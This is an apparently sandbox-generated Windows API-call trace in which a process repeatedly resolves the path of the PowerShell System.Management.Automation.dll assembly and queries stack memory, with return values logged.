	[0225.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.428] GetLastError () returned 0x0
	[0225.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.428] GetLastError () returned 0x0
	[0225.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.428] GetLastError () returned 0x0
	[0225.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.428] GetLastError () returned 0x0
	[0225.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.429] GetLastError () returned 0x0
	[0225.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.429] GetLastError () returned 0x0
	[0225.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.429] GetLastError () returned 0x0
	[0225.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.429] GetLastError () returned 0x0
	[0225.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.429] GetLastError () returned 0x0
	[0225.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.429] GetLastError () returned 0x0
	[0225.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.429] GetLastError () returned 0x0
	[0225.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.429] GetLastError () returned 0x0
	[0225.430] VirtualQuery (in: lpAddress=0x10d744, lpBuffer=0x10e744, dwLength=0x1c | out: lpBuffer=0x10e744*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e138, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.430] GetLastError () returned 0x0
	[0225.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.430] GetLastError () returned 0x0
	[0225.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.430] GetLastError () returned 0x0
	[0225.430] VirtualQuery (in: lpAddress=0x10d744, lpBuffer=0x10e744, dwLength=0x1c | out: lpBuffer=0x10e744*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.430] GetLastError () returned 0x0
	[0225.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.431] GetLastError () returned 0x0
	[0225.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.431] GetLastError () returned 0x0
	[0225.431] VirtualQuery (in: lpAddress=0x10d374, lpBuffer=0x10e374, dwLength=0x1c | out: lpBuffer=0x10e374*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.431] VirtualQuery (in: lpAddress=0x10d3b0, lpBuffer=0x10e3b0, dwLength=0x1c | out: lpBuffer=0x10e3b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.431] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.432] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.432] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.432] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.432] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.433] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.433] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.433] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.433] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.433] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.434] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.434] VirtualQuery (in: lpAddress=0x10d51c, lpBuffer=0x10e51c, dwLength=0x1c | out: lpBuffer=0x10e51c*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.434] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.435] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.435] VirtualQuery (in: lpAddress=0x10d678, lpBuffer=0x10e678, dwLength=0x1c | out: lpBuffer=0x10e678*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.435] VirtualQuery (in: lpAddress=0x10d6b4, lpBuffer=0x10e6b4, dwLength=0x1c | out: lpBuffer=0x10e6b4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.435] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xdd9b5cff, Data2=0x83b, Data3=0x490d, Data4=([0]=0xb8, [1]=0x4f, [2]=0xde, [3]=0x88, [4]=0x3b, [5]=0x65, [6]=0x73, [7]=0x6))) returned 0x0
	[0225.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.435] GetLastError () returned 0x0
	[0225.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.435] GetLastError () returned 0x0
	[0225.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.435] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.436] GetLastError () returned 0x0
	[0225.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.437] GetLastError () returned 0x0
	[0225.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.437] GetLastError () returned 0x0
	[0225.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.437] GetLastError () returned 0x0
	[0225.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.437] GetLastError () returned 0x0
	[0225.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.437] GetLastError () returned 0x0
	[0225.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.437] GetLastError () returned 0x0
	[0225.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.437] GetLastError () returned 0x0
	[0225.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.438] GetLastError () returned 0x0
	[0225.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.438] GetLastError () returned 0x0
	[0225.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.438] GetLastError () returned 0x0
	[0225.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.438] GetLastError () returned 0x0
	[0225.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.438] GetLastError () returned 0x0
	[0225.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.438] GetLastError () returned 0x0
	[0225.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.438] GetLastError () returned 0x0
	[0225.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.438] GetLastError () returned 0x0
	[0225.438] VirtualQuery (in: lpAddress=0x10d374, lpBuffer=0x10e374, dwLength=0x1c | out: lpBuffer=0x10e374*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.439] VirtualQuery (in: lpAddress=0x10d3b0, lpBuffer=0x10e3b0, dwLength=0x1c | out: lpBuffer=0x10e3b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e164, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.439] GetLastError () returned 0x0
	[0225.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.439] GetLastError () returned 0x0
